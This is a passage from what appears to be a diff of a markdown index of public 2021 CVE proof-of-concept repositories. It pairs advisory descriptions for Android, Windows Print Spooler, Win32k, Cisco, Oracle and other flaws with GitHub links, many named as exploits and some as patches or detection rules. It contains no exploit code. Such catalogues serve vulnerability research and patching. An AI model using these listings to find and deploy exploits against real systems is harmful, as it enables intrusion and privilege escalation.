disclosure to a proximal attacker, with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10Android ID: A-154114734 + + +- [uthrasri/frameworks_opt_net_wifi_CVE-2021-0466](https://github.com/uthrasri/frameworks_opt_net_wifi_CVE-2021-0466) + +### CVE-2021-0472 (2021-06-11) + +In shouldLockKeyguard of LockTaskController.java, there is a possible way to exit App Pinning without a PIN due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-176801033 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0472](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0472) + +### CVE-2021-0474 (2021-06-11) + +In avrc_msg_cback of avrc_api.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-177611958 + + +- [pazhanivel07/system_bt_A10-r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10-r33_CVE-2021-0474) +- [pazhanivel07/system_bt_A10_r33_CVE-2021-0474](https://github.com/pazhanivel07/system_bt_A10_r33_CVE-2021-0474) + +### CVE-2021-0475 (2021-06-11) + +In on_l2cap_data_ind of btif_sock_l2cap.cc, there is possible memory corruption due to a use after free. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-175686168 + + +- [ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475](https://github.com/ShaikUsaf/system_bt_AOSP10_r33_CVE-2021-0475) + +### CVE-2021-0476 (2021-06-11) + +In FindOrCreatePeer of btif_av.cc, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-169252501 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0476](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0476) + +### CVE-2021-0478 (2021-06-21) + +In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-169255797 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0478) + +### CVE-2021-0481 (2021-06-11) + +In onActivityResult of EditUserPhotoController.java, there is a possible access of unauthorized files due to an unexpected URI handler. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-172939189 + + +- [ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481](https://github.com/ShaikUsaf/packages_apps_settings_AOSP10_r33_CVE-2021-0481) + +### CVE-2021-0506 (2021-06-21) + +In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-181962311 + + +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506) + +### CVE-2021-0507 (2021-06-21) + +In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181860042 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0507](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0507) + +### CVE-2021-0508 (2021-06-21) + +In various functions of DrmPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-176444154 + + +- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0508) + +### CVE-2021-0509 (2021-06-21) + +In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161 + + +- [Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509](https://github.com/Trinadh465/frameworks_av_AOSP10_r33_CVE-2021-0509) + +### CVE-2021-0510 (2021-06-21) + +In decrypt_1_2 of CryptoPlugin.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444622 + + +- [pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510](https://github.com/pazhanivel07/hardware_interfaces-A10_r33_CVE-2021-0510) + +### CVE-2021-0511 (2021-06-21) + +In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11Android ID: A-178055795 + + +- [Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511](https://github.com/Trinadh465/platform_art_AOSP10_r33_CVE-2021-0511) + +### CVE-2021-0513 (2021-06-21) + +In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-156090809 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0513](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0513) + +### CVE-2021-0516 (2021-06-21) + +In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-181660448 + + +- [Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516](https://github.com/Satheesh575555/external_wpa_supplicant_8_AOSP10_r33_CVE-2021-0516) + +### CVE-2021-0519 (2021-08-17) + +In BITSTREAM_FLUSH of ih264e_bitstream.h, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-176533109 + + +- [nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519](https://github.com/nanopathi/external_libavc_AOSP10_r33_CVE-2021-0519) + +### CVE-2021-0520 (2021-06-21) + +In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-176237595 + + +- [nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520) +- [ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520](https://github.com/ShaikUsaf/frameworks_av_AOSP10_r33_CVE-2021-0520) + +### CVE-2021-0522 (2021-06-21) + +In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-9 Android-10Android ID: A-174182139 + + +- [nanopathi/system_bt_AOSP10_r33_CVE-2021-0522](https://github.com/nanopathi/system_bt_AOSP10_r33_CVE-2021-0522) + +### CVE-2021-0586 (2021-07-14) + +In onCreate of DevicePickerFragment.java, there is a possible way to trick the user to select an unwanted bluetooth device due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-182584940 + + +- [nanopathi/packages_apps_Settings_CVE-2021-0586](https://github.com/nanopathi/packages_apps_Settings_CVE-2021-0586) + +### CVE-2021-0589 (2021-07-14) + +In BTM_TryAllocateSCN of btm_scn.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-180939982 + + +- [Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Trinadh465/System_bt_AOSP10_r33_CVE-2021-0589) +- [Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589](https://github.com/Satheesh575555/system_bt_AOSP10_r33_CVE-2021-0589) + +### CVE-2021-0594 (2021-07-14) + +In onCreate of ConfirmConnectActivity, there is a possible remote bypass of user consent due to improper input validation. This could lead to remote (proximal, NFC) escalation of privilege allowing an attacker to deceive a user into allowing a Bluetooth connection with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-176445224 + + +- [Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594](https://github.com/Satheesh575555/packages_apps_Nfc_AOSP10_r33_CVE-2021-0594) + +### CVE-2021-0595 (2021-10-06) + +In lockAllProfileTasks of RootWindowContainer.java, there is a possible way to access the work profile without the profile PIN, after logging in. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-177457096 + + +- [pazhanivel07/Settings-CVE-2021-0595](https://github.com/pazhanivel07/Settings-CVE-2021-0595) +- [pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595](https://github.com/pazhanivel07/frameworks_base_Aosp10_r33_CVE-2021-0595) + +### CVE-2021-0600 (2021-07-14) + +In onCreate of DeviceAdminAdd.java, there is a possible way to mislead a user to activate a device admin app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-179042963 + + +- [Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600](https://github.com/Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600) + +### CVE-2021-0640 (2021-08-17) + +In noteAtomLogged of StatsdStats.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-187957589 + + +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0640) + +### CVE-2021-0652 (2021-10-22) + +In VectorDrawable::VectorDrawable of VectorDrawable.java, there is a possible way to introduce a memory corruption due to sharing of not thread-safe objects. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-8.1 Android-9 Android-10 Android-11Android ID: A-185178568 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652) + +### CVE-2021-0683 (2021-10-06) + +In runTraceIpcStop of ActivityManagerShellCommand.java, there is a possible deletion of system files due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-8.1 Android-9 Android-10Android ID: A-185398942 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0683_CVE-2021-0708) + +### CVE-2021-0688 (2021-10-06) + +In lockNow of PhoneWindowManager.java, there is a possible lock screen bypass due to a race condition. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-8.1 Android-9Android ID: A-161149543 + + +- [Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688](https://github.com/Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688) + +### CVE-2021-0705 (2021-10-22) + +In sanitizeSbn of NotificationManagerService.java, there is a possible way to keep service running in foreground and keep granted permissions due to Bypass of Background Service Restrictions. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-10Android ID: A-185388103 + + +- [ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0705) +- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2021-0705) + +### CVE-2021-0928 (2021-12-15) + +In createFromParcel of OutputConfiguration.java, there is a possible parcel serialization/deserialization mismatch due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-9Android ID: A-188675581 + + +- [michalbednarski/ReparcelBug2](https://github.com/michalbednarski/ReparcelBug2) + +### CVE-2021-0954 (2021-12-15) + +In ResolverActivity, there is a possible user interaction bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11Android ID: A-143559931 + + +- [nanopathi/framework_base_AOSP10_r33_CVE-2021-0954](https://github.com/nanopathi/framework_base_AOSP10_r33_CVE-2021-0954) + +### CVE-2021-0963 (2021-12-15) + +In onCreate of KeyChainActivity.java, there is a possible way to use an app certificate stored in keychain due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-9Android ID: A-199754277 + + +- [Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963](https://github.com/Trinadh465/packages_apps_KeyChain_AOSP10_r33_CVE-2021-0963) + +### CVE-2021-22 +- [LingerANR/CVE-2021-22-555](https://github.com/LingerANR/CVE-2021-22-555) + +### CVE-2021-403 +- [rhysmcneill/CVE-2021-403](https://github.com/rhysmcneill/CVE-2021-403) + +### CVE-2021-521 +- [NagendraPittu/CVE-2021-521-Exploit](https://github.com/NagendraPittu/CVE-2021-521-Exploit) + +### CVE-2021-1056 (2021-01-08) + +NVIDIA GPU Display Driver for Linux, all versions, contains a vulnerability in the kernel mode layer (nvidia.ko) in which it does not completely honor operating system file system permissions to provide GPU device-level isolation, which may lead to denial of service or information disclosure. + + +- [pokerfaceSad/CVE-2021-1056](https://github.com/pokerfaceSad/CVE-2021-1056) + +### CVE-2021-1366 (2021-02-17) + +A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to perform a DLL hijacking attack on an affected device if the VPN Posture (HostScan) Module is installed on the AnyConnect client. This vulnerability is due to insufficient validation of resources that are loaded by the application at run time. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process. A successful exploit could allow the attacker to execute arbitrary code on the affected machine with SYSTEM privileges. To exploit this vulnerability, the attacker needs valid credentials on the Windows system. + + +- [koztkozt/CVE-2021-1366](https://github.com/koztkozt/CVE-2021-1366) + +### CVE-2021-1480 (2021-04-08) + +Multiple vulnerabilities in Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to execute arbitrary code or allow an authenticated, local attacker to gain escalated privileges on an affected system. For more information about these vulnerabilities, see the Details section of this advisory. + + +- [xmco/sdwan-cve-2021-1480](https://github.com/xmco/sdwan-cve-2021-1480) + +### CVE-2021-1497 (2021-05-06) + +Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory. + + +- [34zY/APT-Backpack](https://github.com/34zY/APT-Backpack) + +### CVE-2021-1585 (2021-07-08) + +A vulnerability in the Cisco Adaptive Security Device Manager (ASDM) Launcher could allow an unauthenticated, remote attacker to execute arbitrary code on a user's operating system. This vulnerability is due to a lack of proper signature verification for specific code exchanged between the ASDM and the Launcher. An attacker could exploit this vulnerability by leveraging a man-in-the-middle position on the network to intercept the traffic between the Launcher and the ASDM and then inject arbitrary code. A successful exploit could allow the attacker to execute arbitrary code on the user's operating system with the level of privileges assigned to the ASDM Launcher. A successful exploit may require the attacker to perform a social engineering attack to persuade the user to initiate communication from the Launcher to the ASDM. + + +- [jbaines-r7/staystaystay](https://github.com/jbaines-r7/staystaystay) + +### CVE-2021-1636 (2021-01-12) + +Microsoft SQL Elevation of Privilege Vulnerability + + +- [Nate0634034090/bug-free-memory](https://github.com/Nate0634034090/bug-free-memory) + +### CVE-2021-1647 (2021-01-12) + +Microsoft Defender Remote Code Execution Vulnerability + + +- [findcool/cve-2021-1647](https://github.com/findcool/cve-2021-1647) + +### CVE-2021-1656 (2021-01-12) + +TPM Device Driver Information Disclosure Vulnerability + + +- [waleedassar/CVE-2021-1656](https://github.com/waleedassar/CVE-2021-1656) + +### CVE-2021-1675 (2021-06-08) + +Windows Print Spooler Remote Code Execution Vulnerability + + +- [yu2u/CVE-2021-1675](https://github.com/yu2u/CVE-2021-1675) +- [cube0x0/CVE-2021-1675](https://github.com/cube0x0/CVE-2021-1675) +- [LaresLLC/CVE-2021-1675](https://github.com/LaresLLC/CVE-2021-1675) +- [kondah/patch-cve-2021-1675](https://github.com/kondah/patch-cve-2021-1675) +- [evilashz/CVE-2021-1675-LPE-EXP](https://github.com/evilashz/CVE-2021-1675-LPE-EXP) +- [hlldz/CVE-2021-1675-LPE](https://github.com/hlldz/CVE-2021-1675-LPE) +- [puckiestyle/CVE-2021-1675](https://github.com/puckiestyle/CVE-2021-1675) +- [cybersecurityworks553/CVE-2021-1675_PrintNightMare](https://github.com/cybersecurityworks553/CVE-2021-1675_PrintNightMare) +- [tanarchytan/CVE-2021-1675](https://github.com/tanarchytan/CVE-2021-1675) +- [calebstewart/CVE-2021-1675](https://github.com/calebstewart/CVE-2021-1675) +- [Leonidus0x10/CVE-2021-1675-SCANNER](https://github.com/Leonidus0x10/CVE-2021-1675-SCANNER) +- [thomasgeens/CVE-2021-1675](https://github.com/thomasgeens/CVE-2021-1675) +- [mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery](https://github.com/mrezqi/CVE-2021-1675_CarbonBlack_HuntingQuery) +- [killtr0/CVE-2021-1675-PrintNightmare](https://github.com/killtr0/CVE-2021-1675-PrintNightmare) +- [corelight/CVE-2021-1675](https://github.com/corelight/CVE-2021-1675) +- [kougyokugentou/CVE-2021-1675](https://github.com/kougyokugentou/CVE-2021-1675) +- [ptter23/CVE-2021-1675](https://github.com/ptter23/CVE-2021-1675) +- [initconf/cve-2021-1675-printnightmare](https://github.com/initconf/cve-2021-1675-printnightmare) +- [ozergoker/PrintNightmare](https://github.com/ozergoker/PrintNightmare) +- [exploitblizzard/PrintNightmare-CVE-2021-1675](https://github.com/exploitblizzard/PrintNightmare-CVE-2021-1675) +- [edsonjt81/CVE-2021-1675](https://github.com/edsonjt81/CVE-2021-1675) +- [sailay1996/PrintNightmare-LPE](https://github.com/sailay1996/PrintNightmare-LPE) +- [JumpsecLabs/PrintNightmare](https://github.com/JumpsecLabs/PrintNightmare) +- [bartimusprimed/CVE-2021-1675-Yara](https://github.com/bartimusprimed/CVE-2021-1675-Yara) +- [k8gege/cve-2021-1675](https://github.com/k8gege/cve-2021-1675) +- [galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527](https://github.com/galoget/PrintNightmare-CVE-2021-1675-CVE-2021-34527) +- [thalpius/Microsoft-CVE-2021-1675](https://github.com/thalpius/Microsoft-CVE-2021-1675) +- [zha0/Microsoft-CVE-2021-1675](https://github.com/zha0/Microsoft-CVE-2021-1675) +- [Winter3un/CVE-2021-1675](https://github.com/Winter3un/CVE-2021-1675) +- [hahaleyile/my-CVE-2021-1675](https://github.com/hahaleyile/my-CVE-2021-1675) +- [mstxq17/CVE-2021-1675_RDL_LPE](https://github.com/mstxq17/CVE-2021-1675_RDL_LPE) +- [ly4k/PrintNightmare](https://github.com/ly4k/PrintNightmare) +- [Wra7h/SharpPN](https://github.com/Wra7h/SharpPN) +- [OppressionBreedsResistance/CVE-2021-1675-PrintNightmare](https://github.com/OppressionBreedsResistance/CVE-2021-1675-PrintNightmare) +- [eversinc33/NimNightmare](https://github.com/eversinc33/NimNightmare) +- [AndrewTrube/CVE-2021-1675](https://github.com/AndrewTrube/CVE-2021-1675) +- [TheJoyOfHacking/cube0x0-CVE-2021-1675](https://github.com/TheJoyOfHacking/cube0x0-CVE-2021-1675) +- [TheJoyOfHacking/calebstewart-CVE-2021-1675](https://github.com/TheJoyOfHacking/calebstewart-CVE-2021-1675) +- [jj4152/cve-2021-1675](https://github.com/jj4152/cve-2021-1675) +- [r1skkam/PrintNightmare](https://github.com/r1skkam/PrintNightmare) +- [peckre/PNCVE-Win10-20H2-Exploit](https://github.com/peckre/PNCVE-Win10-20H2-Exploit) +- [whoami-chmod777/CVE-2021-1675-CVE-2021-34527](https://github.com/whoami-chmod777/CVE-2021-1675-CVE-2021-34527) +- [whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-](https://github.com/whoami-chmod777/CVE-2021-1675---PrintNightmare-LPE-PowerShell-) +- [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit) + +### CVE-2021-1678 (2021-01-12) + +Windows Print Spooler Spoofing Vulnerability + + +- [alvaciroliveira/RpcAuthnLevelPrivacyEnabled](https://github.com/alvaciroliveira/RpcAuthnLevelPrivacyEnabled) + +### CVE-2021-1699 (2021-01-12) + +Windows (modem.sys) Information Disclosure Vulnerability + + +- [waleedassar/CVE-2021-1699](https://github.com/waleedassar/CVE-2021-1699) + +### CVE-2021-1732 (2021-02-25) + +Windows Win32k Elevation of Privilege Vulnerability + + +- [KaLendsi/CVE-2021-1732-Exploit](https://github.com/KaLendsi/CVE-2021-1732-Exploit) +- [k-k-k-k-k/CVE-2021-1732](https://github.com/k-k-k-k-k/CVE-2021-1732) +- [oneoy/CVE-2021-1732-Exploit](https://github.com/oneoy/CVE-2021-1732-Exploit) +- [linuxdy/CVE-2021-1732_exp](https://github.com/linuxdy/CVE-2021-1732_exp) +- [Pai-Po/CVE-2021-1732](https://github.com/Pai-Po/CVE-2021-1732) +- [exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732](https://github.com/exploitblizzard/Windows-Privilege-Escalation-CVE-2021-1732) +- [BeneficialCode/CVE-2021-1732](https://github.com/BeneficialCode/CVE-2021-1732) +- [ExploitCN/CVE-2021-1732-EXP-](https://github.com/ExploitCN/CVE-2021-1732-EXP-) +- [r1l4-i3pur1l4/CVE-2021-1732](https://github.com/r1l4-i3pur1l4/CVE-2021-1732) +- [fenalik/CVE-2021-1732](https://github.com/fenalik/CVE-2021-1732) +- [4dp/CVE-2021-1732](https://github.com/4dp/CVE-2021-1732) +- [yangshifan-git/CVE-2021-1732](https://github.com/yangshifan-git/CVE-2021-1732) +- [asepsaepdin/CVE-2021-1732](https://github.com/asepsaepdin/CVE-2021-1732) + +### CVE-2021-1748 (2021-04-02) + +A validation issue was addressed with improved input sanitization. This issue is fixed in tvOS 14.4, watchOS 7.3, iOS 14.4 and iPadOS 14.4. Processing a maliciously crafted URL may lead to arbitrary javascript code execution. + + +- [Ivanhoe76zzzz/itmsBlock](https://github.com/Ivanhoe76zzzz/itmsBlock) +- [ChiChou/mistune-patch-backport](https://github.com/ChiChou/mistune-patch-backport) + +### CVE-2021-1782 (2021-04-02) + +A race condition was addressed with improved locking. This issue is fixed in macOS Big Sur 11.2, Security Update 2021-001 Catalina, Security Update 2021-001 Mojave, watchOS 7.3, tvOS 14.4, iOS 14.4 and iPadOS 14.4. A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited.. + + +- [raymontag/cve-2021-1782](https://github.com/raymontag/cve-2021-1782) +- [synacktiv/CVE-2021-1782](https://github.com/synacktiv/CVE-2021-1782) + +### CVE-2021-1883 (2021-09-08) + +This issue was addressed with improved checks. This issue is fixed in Security Update 2021-004 Mojave, iOS 14.5 and iPadOS 14.5, watchOS 7.4, Security Update 2021-003 Catalina, tvOS 14.5, macOS Big Sur 11.3. Processing maliciously crafted server messages may lead to heap corruption. + + +- [gabe-k/CVE-2021-1883](https://github.com/gabe-k/CVE-2021-1883) + +### CVE-2021-1905 (2021-05-07) + +Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables + + +- [TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664](https://github.com/TAKIANFIF/CVE-2021-1905-CVE-2021-1906-CVE-2021-28663-CVE-2021-28664) + +### CVE-2021-1961 (2021-09-09) + +Possible buffer overflow due to lack of offset length check while updating the buffer value in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables + + +- [tamirzb/CVE-2021-1961](https://github.com/tamirzb/CVE-2021-1961) + +### CVE-2021-1965 (2021-07-13) + +Possible buffer overflow due to lack of parameter length check during MBSSID scan IE parse in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Mobile, Snapdragon Wired Infrastructure and Networking + + +- [parsdefense/CVE-2021-1965](https://github.com/parsdefense/CVE-2021-1965) +- [foxtrot/CVE-2021-1965](https://github.com/foxtrot/CVE-2021-1965) + +### CVE-2021-1994 (2021-01-20) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). + + +- [somatrasss/weblogic2021](https://github.com/somatrasss/weblogic2021) + +### CVE-2021-2021 (2021-01-20) + +Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). + + +- [TheCryingGame/CVE-2021-2021good](https://github.com/TheCryingGame/CVE-2021-2021good) + +### CVE-2021-2109 (2021-01-20) + +Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 7.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H). + + +- [Al1ex/CVE-2021-2109](https://github.com/Al1ex/CVE-2021-2109) +- [rabbitsafe/CVE-2021-2109](https://github.com/rabbitsafe/CVE-2021-2109) +- [yuaneuro/CVE-2021-2109_poc](https://github.com/yuaneuro/CVE-2021-2109_poc) +- [dinosn/CVE-2021-2109](https://github.com/dinosn/CVE-2021-2109) +- [lnwza0x0a/CVE-2021-2109](https://github.com/lnwza0x0a/CVE-2021-2109) +- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109) + +### CVE-2021-2119 (2021-01-20) + +Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is Prior to 6.1.18. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N). + + +- [Sauercloud/RWCTF21-VirtualBox-61-escape](https://github.com/Sauercloud/RWCTF21-VirtualBox-61-escape) +- [chatbottesisgmailh/Sauercloude](https://github.com/chatbottesisgmailh/Sauercloude) +- [shi10587s/Sauercloude](https://github.com/shi10587s/Sauercloude) + +### CVE-2021-2173 (2021-04-22) + +Vulnerability in the Recovery component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having DBA Level Account privilege with network access via Oracle Net to compromise Recovery. While the vulnerability is in Recovery, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Recovery accessible data. CVSS 3.1 Base Score 4.1 (Confidentiality 